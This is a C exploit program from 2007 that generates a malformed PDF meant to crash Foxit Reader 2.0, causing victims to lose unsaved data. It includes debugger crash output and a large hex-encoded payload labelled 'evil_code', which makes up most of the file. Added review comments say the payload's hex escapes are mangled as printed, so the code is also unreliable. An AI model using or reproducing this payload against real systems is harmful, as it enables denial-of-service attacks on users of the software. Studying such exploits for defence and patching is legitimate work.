# Title : Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit
# Published : 2007-04-20
# Author : n00b
/**
*Created Friday, April 20 2007
*
*Moderator of http://igniteds.net
*
*Foxit Reader 2.0 for Windows remote DoS exploit created by n00b
*Foxit PDF viewer is prone to a DoS condition:
*by opening a malformed PDF document it is possible
*to crash Foxit Reader, which could cause the victim to
*lose any unsaved data. The vendor has been notified.
*Vendor's web site: http://www.foxitsoftware.com.
*It is also possible to crash Foxit Reader via Opera
*or Internet Explorer when the PDF file is opened for viewing
*online.
*Tested on : windows xp service packs 1 and 2
*linux version not tested.
*
*Shouts to every one at milw0rm and IG.
*Credits go to n00b for finding this vulnerability.
*
*To compile, use Dev-C++.
*
* ..Debug info..
*************************************************************************
*****************
*(7e90.7e94): Access violation - code c0000005 (first chance)
*First chance exceptions are reported before any exception handling.
*This exception may be expected and handled.
*eax=00000000 ebx=5d8a0000 ecx=1d89fff0 edx=7627ffc0 esi=00f9ac2c edi=00000040
*eip=0049b291 esp=0012f614 ebp=5d8a0000 iopl=0 nv up ei pl nz ac pe nc
*cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
**** ERROR: Module load completed but symbols could not be loaded for
C:Program FilesFoxit Reader.exe
*Foxit_Reader+0x9b291:
*0049b291 f3ab rep stos dword ptr es:[edi] es:0023:00000040=????????
*************************************************************************
********************************
**/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>
#define PDF "dos.pdf"
#define Credits_to "n00b"
/*
 * Byte contents of the file that main() writes to disk, given as a
 * hex-escaped string (the trailing NUL added by the compiler is not written).
 *
 * NOTE(review): the backslashes of the `\x` escapes appear to have been
 * stripped when this listing was extracted, so as printed each pair is plain
 * ASCII text such as "x25x50" rather than the two bytes 0x25 0x50 the author
 * presumably intended; treat the literal below as a mangled transcription.
 *
 * Read as hex, the pairs spell out a small PDF: a "%PDF-1.3" header, a
 * linearization dictionary, an xref table, a trailer whose /Size and /ID
 * values are far larger than the objects actually present, a catalog object
 * and a final object with an out-of-range object number. That malformed
 * structure is what the header comment describes, and is presumably what
 * leads to the faulting `rep stos` shown in the debug output — confirm
 * against the debugger rather than this comment.
 */
char evil_code[] =
"x25x50x44x46x2dx31x2ex33x0dx0ax25xe2xe3xcfxd3x0d"
"x0ax31x34x20x30x20x6fx62x6ax0dx0ax3cx3cx20x0dx0a"
"x2fx4cx69x6ex65x61x72x69x7ax65x64x20x31x20x0dx0a"
"x2fx4fx20x31x37x20x0dx0ax2fx48x20x5bx20x39x31x31"
"x20x31x37x37x20x5dx20x0dx0ax2fx4cx20x33x39x37x38"
"x20x0dx0ax2fx45x20x32x36x37x32x20x0dx0ax2fx4ex20"
"x31x20x0dx0ax2fx54x20x33x35x38x30x20x0dx0ax3ex3e"
"x20x0dx0ax65x6ex64x6fx62x6ax0dx0ax20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x78x72x65x66x0dx0ax31"
"x34x20x31x38x20x0dx0ax30x30x30x30x30x30x30x30x31"
"x36x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x30x37x30x36x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x30x38x36x30x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x30x38x38x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x31x33x32"
"x39x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x34x30x39x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x31x35x30x38x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x36x31x34x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x31x37x30"
"x39x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x38x30x39x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x31x38x35x33x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x38x38x32x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x32x33x34"
"x30x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x32x34x34x36x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x32x34x36x37x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x32x35x37x31x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x30x39x31"
"x31x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x30x36x38x20x30x30x30x30x30x20x6ex0dx0ax74"
"x72x61x69x6cx65x72x0dx0ax3cx3cx0dx0ax2fx53x69x7a"
"x65x20x39x39x39x39x39x0dx0ax2fx49x6ex66x6fx20x32"
"x20x30x20x52x20x0dx0ax2fx52x6fx6fx74x20x31x35x20"
"x30x20x52x20x0dx0ax2fx50x72x65x76x20x33x35x37x30"
"x20x0dx0ax2fx49x44x5bx3cx41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x3ex5dx0dx0ax3ex3ex0dx0ax73x74"
"x61x72x74x78x72x65x66x0dx0ax30x0dx0ax25x25x45x4f"
"x46x0dx0ax20x20x20x20x20x20x0dx0ax31x35x20x30x20"
"x6fx62x6ax0dx0ax3cx3cx20x0dx0ax2fx54x79x70x65x20"
"x2fx43x61x74x61x6cx6fx67x20x0dx0ax2fx50x61x67x65"
"x73x20x31x20x30x20x52x20x0dx0ax2fx53x74x72x75x63"
"x74x54x72x65x65x52x6fx6fx74x20x32x32x20x30x20x52"
"x20x0dx0ax2fx53x70x69x64x65x72x49x6ex66x6fx20x33"
"x20x30x20x52x20x0dx0ax2fx4ex61x6dx65x73x20x31x36"
"x20x30x20x52x20x0dx0ax2fx4fx75x74x6cx69x6ex65x73"
"x20x31x38x20x30x20x52x20x0dx0ax2fx50x61x67x65x4d"
"x6fx64x65x20x2fx55x73x65x4fx75x74x6cx69x6ex65x73"
"x20x0dx0ax3ex3ex20x0dx0ax65x6ex64x6fx62x6ax0dx0a"
"x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39"
"x39x20x30x20x6fx62x6ax0dx0ax3cx3cx20x0dx0ax0dx0a"
"x31x37x33x0dx0ax25x25x45x4fx46x0dx0a";
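/*
 * Entry point: writes the bytes of evil_code (without its NUL terminator)
 * to the file named by PDF, in binary mode.
 *
 * Returns EXIT_SUCCESS when the file was written and closed, EXIT_FAILURE
 * when it could not be opened, fully written or closed. The original
 * called exit(0) on an open failure, which reported success to the shell
 * even though no file had been produced; it also never checked fclose(),
 * so a short write at flush time went unnoticed.
 */
int main(void) {
    /* sizeof counts the implicit trailing NUL, which must not be written. */
    const size_t len = sizeof evil_code - 1;

    FILE *file = fopen(PDF, "wb");
    if (file == NULL) {
        printf("fuck We are Unable to build the file %s", PDF);
        return EXIT_FAILURE;
    }
    printf("Creating pdf File please wait\n");

    /* One bounded write replaces the per-byte fputc loop; fwrite reports
     * how many bytes actually made it into the stream buffer. */
    if (fwrite(evil_code, 1, len, file) != len) {
        printf("Unable to write the file %s\n", PDF);
        fclose(file);
        return EXIT_FAILURE;
    }

    /* fclose flushes the buffer; a failure here means the file on disk is
     * incomplete even though fwrite succeeded. */
    if (fclose(file) != 0) {
        printf("Unable to close the file %s\n", PDF);
        return EXIT_FAILURE;
    }

    printf("pdf file %s successfully created hoooha..\n", PDF);
    return EXIT_SUCCESS;
}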